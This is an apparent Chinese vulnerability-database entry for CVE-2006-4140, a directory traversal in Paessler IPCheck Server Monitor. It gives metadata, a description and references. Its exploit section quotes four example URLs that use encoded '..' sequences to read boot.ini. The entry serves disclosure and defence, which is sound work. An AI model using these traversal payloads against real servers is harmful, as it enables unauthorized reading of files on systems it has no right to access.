IPCheck Server Monitor 畸形的".."(两点)序列目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110792 漏洞类型 路径遍历
发布时间 2006-08-10 更新时间 2007-07-06
CVE编号 CVE-2006-4140 CNNVD-ID CNNVD-200608-239
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28374
https://www.securityfocus.com/bid/19473
https://cxsecurity.com/issue/WLB-2006080098
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-239
|漏洞详情
IPCheckServerMonitor5.3.3.639/640之前的版本存在目录遍历漏洞,远程攻击者可借助URL中畸形的".."(两点)序列,包括:(1)"..%2f"(编码"/"斜杠),"..../"(多个点),和"..%255c../"(双重编码"\"反斜杠),来读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/19473/info

IPCheck Server Monitor is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

IPCheck Server Monitor 5.3.2.609 is vulnerable; other versions may also be affected.

http://www.example.com:8080/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini http://www.example.com/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini http://www.example.com/images../..../..../..../..../..../..../..../..../..../..../..../boot.ini http://www.example.com/images/..%255c../..%255c../..%255c../..%255c../boot.ini
|受影响的产品
Paessler IPCheck Server Monitor 5.3.2 .609 Paessler IPCheck Server Monitor 5.3 .508 Paessler IPCheck Server Monitor 5.2 .404 Paessler IPCheck Server Monitor 5.1 .342 Paessler IPCheck Serv
|参考资料

来源:XF
名称:ipcheck-url-directory-traversal(28341)
链接:http://xforce.iss.net/xforce/xfdb/28341
来源:BID
名称:19473
链接:http://www.securityfocus.com/bid/19473
来源:BUGTRAQ
名称:20060824Re:DirectoryTraversalvulnerabilityinIPCheckMonitorServer
链接:http://www.securityfocus.com/archive/1/archive/1/444227/100/0/threaded
来源:BUGTRAQ
名称:20060810DirectoryTraversalvulnerabilityinIPCheckMonitorServer
链接:http://www.securityfocus.com/archive/1/archive/1/442822/100/0/threaded
来源:www.paessler.com
链接:http://www.paessler.com/ipcheck/history
来源:www.paessler.com
链接:http://www.paessler.com/forum/viewtopic.php?p=4047&sid=f8c0f03a69d9498338797c6ea3cc6733
来源:VUPEN
名称:ADV-2006-3259
链接:http://www.frsirt.com/english/advisories/2006/3259
来源:SECTRACK
名称:1016676
链接:http://securitytracker.com/id?1016676
来源:SECUNIA
名称:21468
链接:http://secunia.com/advisories/21468
来源:SREASON
名称:1389
链接:http://securityreason.com/securityalert/1389